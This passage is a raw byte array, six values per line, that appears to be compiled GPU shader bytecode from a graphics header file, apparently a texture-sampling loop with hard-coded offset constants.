32, 0, 0, 0, 0, 0,
21, 0, 0, 0, 17, 0,
0, 8, 66, 0, 16, 0,
1, 0, 0, 0, 70, 14,
16, 0, 0, 0, 0, 0,
70, 142, 32, 0, 0, 0,
0, 0, 22, 0, 0, 0,
17, 0, 0, 8, 130, 0,
16, 0, 1, 0, 0, 0,
70, 14, 16, 0, 0, 0,
0, 0, 70, 142, 32, 0,
0, 0, 0, 0, 23, 0,
0, 0, 14, 0, 0, 7,
242, 0, 16, 0, 0, 0,
0, 0, 70, 14, 16, 0,
1, 0, 0, 0, 246, 15,
16, 0, 1, 0, 0, 0,
54, 0, 0, 5, 130, 0,
16, 0, 1, 0, 0, 0,
58, 0, 16, 0, 0, 0,
0, 0, 54, 0, 0, 5,
114, 0, 16, 0, 1, 0,
0, 0, 70, 2, 16, 0,
0, 0, 0, 0, 54, 0,
0, 5, 130, 0, 16, 0,
0, 0, 0, 0, 1, 64,
0, 0, 255, 255, 255, 255,
54, 0, 0, 8, 50, 0,
16, 0, 2, 0, 0, 0,
2, 64, 0, 0, 0, 0,
0, 0, 0, 0, 128, 63,
0, 0, 0, 0, 0, 0,
0, 0, 48, 0, 0, 1,
79, 0, 0, 8, 66, 0,
16, 0, 2, 0, 0, 0,
10, 0, 16, 0, 2, 0,
0, 0, 10, 128, 32, 0,
0, 0, 0, 0, 228, 0,
0, 0, 1, 0, 0, 7,
66, 0, 16, 0, 2, 0,
0, 0, 58, 0, 16, 0,
0, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
3, 0, 0, 3, 42, 0,
16, 0, 2, 0, 0, 0,
38, 0, 0, 8, 0, 208,
0, 0, 66, 0, 16, 0,
2, 0, 0, 0, 10, 0,
16, 0, 2, 0, 0, 0,
1, 64, 0, 0, 33, 0,
0, 0, 17, 0, 0, 10,
18, 0, 16, 0, 3, 0,
0, 0, 70, 14, 16, 0,
1, 0, 0, 0, 70, 142,
32, 6, 0, 0, 0, 0,
38, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
17, 0, 0, 10, 34, 0,
16, 0, 3, 0, 0, 0,
70, 14, 16, 0, 1, 0,
0, 0, 70, 142, 32, 6,
0, 0, 0, 0, 39, 0,
0, 0, 42, 0, 16, 0,
2, 0, 0, 0, 17, 0,
0, 10, 66, 0, 16, 0,
3, 0, 0, 0, 70, 14,
16, 0, 1, 0, 0, 0,
70, 142, 32, 6, 0, 0,
0, 0, 40, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 17, 0, 0, 10,
130, 0, 16, 0, 2, 0,
0, 0, 70, 14, 16, 0,
1, 0, 0, 0, 70, 142,
32, 6, 0, 0, 0, 0,
41, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
14, 0, 0, 7, 114, 0,
16, 0, 3, 0, 0, 0,
70, 2, 16, 0, 3, 0,
0, 0, 246, 15, 16, 0,
2, 0, 0, 0, 50, 0,
0, 15, 50, 0, 16, 0,
4, 0, 0, 0, 70, 0,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 0, 0,
0, 63, 0, 0, 0, 63,
0, 0, 0, 0, 0, 0,
0, 0, 2, 64, 0, 0,
0, 0, 0, 63, 0, 0,
0, 63, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 8, 130, 0, 16, 0,
2, 0, 0, 0, 26, 0,
16, 128, 65, 0, 0, 0,
4, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
29, 0, 0, 7, 18, 0,
16, 0, 3, 0, 0, 0,
10, 0, 16, 0, 4, 0,
0, 0, 1, 64, 0, 0,
0, 0, 0, 0, 29, 0,
0, 7, 34, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
10, 0, 16, 0, 4, 0,
0, 0, 1, 0, 0, 7,
18, 0, 16, 0, 3, 0,
0, 0, 26, 0, 16, 0,
3, 0, 0, 0, 10, 0,
16, 0, 3, 0, 0, 0,
29, 0, 0, 7, 34, 0,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
0, 0, 0, 0, 1, 0,
0, 7, 18, 0, 16, 0,
3, 0, 0, 0, 26, 0,
16, 0, 3, 0, 0, 0,
10, 0, 16, 0, 3, 0,
0, 0, 29, 0, 0, 7,
130, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
0, 0, 128, 63, 58, 0,
16, 0, 2, 0, 0, 0,
1, 0, 0, 7, 130, 0,
16, 0, 2, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 10, 0, 16, 0,
3, 0, 0, 0, 29, 0,
0, 7, 18, 0, 16, 0,
3, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 0, 0,
0, 0, 1, 0, 0, 7,
130, 0, 16, 0, 2, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 10, 0,
16, 0, 3, 0, 0, 0,
29, 0, 0, 7, 18, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 0, 0,
128, 63, 42, 0, 16, 0,
3, 0, 0, 0, 1, 0,
0, 7, 130, 0, 16, 0,
2, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
10, 0, 16, 0, 3, 0,
0, 0, 31, 0, 4, 3,
58, 0, 16, 0, 2, 0,
0, 0, 0, 0, 0, 14,
50, 0, 16, 0, 3, 0,
0, 0, 70, 128, 32, 134,
65, 0, 0, 0, 0, 0,
0, 0, 60, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 230, 138, 32, 6,
0, 0, 0, 0, 60, 0,
0, 0, 42, 0, 16, 0,
2, 0, 0, 0, 0, 0,
0, 8, 66, 0, 16, 0,
4, 0, 0, 0, 26, 0,
16, 128, 65, 0, 0, 0,
4, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
50, 0, 0, 12, 50, 0,
16, 0, 4, 0, 0, 0,
134, 0, 16, 0, 4, 0,
0, 0, 70, 0, 16, 0,
3, 0, 0, 0, 70, 128,
32, 6, 0, 0, 0, 0,
60, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
0, 0, 0, 11, 130, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 26, 128, 32, 134,
65, 0, 0, 0, 0, 0,
0, 0, 62, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 56, 0, 0, 10,
50, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
3, 0, 0, 0, 230, 138,
32, 6, 0, 0, 0, 0,
59, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
9, 53, 203, 63, 76, 126,
153, 64, 114, 55, 223, 62,
193, 116, 82, 64, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 2, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 56, 0, 0, 7,
66, 0, 16, 0, 3, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 156, 148, 60, 63,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
120, 241, 251, 62, 42, 0,
16, 0, 3, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
116, 72, 93, 191, 85, 109,
146, 64, 82, 182, 82, 64,
41, 109, 164, 64, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 146, 41,
12, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 87, 247, 181, 62,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 101, 0, 20, 64,
230, 59, 49, 64, 3, 54,
135, 64, 12, 177, 102, 64,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
250, 82, 50, 63, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 19, 88,
217, 62, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 180, 193,
0, 63, 36, 227, 192, 64,
58, 215, 12, 63, 224, 243,
169, 63, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 140, 79, 185, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
133, 185, 113, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
16, 93, 112, 64, 49, 146,
222, 62, 219, 205, 140, 64,
108, 236, 252, 63, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 129, 27,
44, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 201, 36, 6, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 141, 42, 183, 64,
83, 9, 67, 64, 0, 27,
63, 192, 94, 14, 101, 64,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
21, 55, 159, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 170, 1,
12, 63, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 41, 36,
13, 192, 167, 205, 189, 64,
116, 10, 6, 192, 255, 206,
220, 63, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 189, 86, 168, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
245, 166, 80, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
14, 217, 204, 63, 134, 231,
89, 191, 132, 99, 200, 191,
60, 158, 111, 191, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 96, 171,
105, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 203, 102, 105, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 130, 34, 127, 189,
28, 178, 153, 190, 90, 70,
105, 192, 230, 191, 184, 189,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
30, 85, 127, 63, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 53, 245,
48, 63, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 242, 21,
145, 192, 248, 113, 20, 64,
206, 221, 188, 192, 250, 156,
167, 190, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 141, 26, 249, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
70, 249, 193, 62, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
153, 99, 140, 192, 33, 231,
203, 191, 92, 172, 212, 191,
77, 75, 33, 192, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 202, 198,
11, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 195, 192, 70, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 79, 46, 200, 192,
219, 109, 171, 63, 127, 121,
66, 61, 254, 123, 246, 191,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
59, 67, 164, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 211, 237,
102, 63, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 17, 225,
14, 64, 79, 148, 24, 192,
188, 91, 135, 192, 45, 39,
98, 192, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 3, 89, 62, 63,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
252, 46, 220, 62, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
85, 166, 183, 192, 43, 48,
42, 192, 65, 158, 137, 191,
129, 193, 158, 192, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 90, 130,
168, 62, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 97, 68, 250, 62,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 253, 16, 79, 192,
196, 232, 162, 192, 222, 172,
168, 64, 121, 34, 29, 192,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
98, 89, 186, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 67, 39,
200, 62, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 65, 157,
236, 63, 58, 117, 129, 192,
154, 134, 143, 64, 193, 26,
133, 191, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 31, 196, 19, 63,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
154, 18, 14, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
111, 13, 148, 189, 76, 139,
97, 192, 15, 13, 197, 63,
29, 232, 198, 192, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 224, 71,
53, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 78, 230, 163, 62,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 207, 215, 217, 190,
15, 26, 206, 192, 74, 69,
135, 64, 165, 243, 152, 192,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
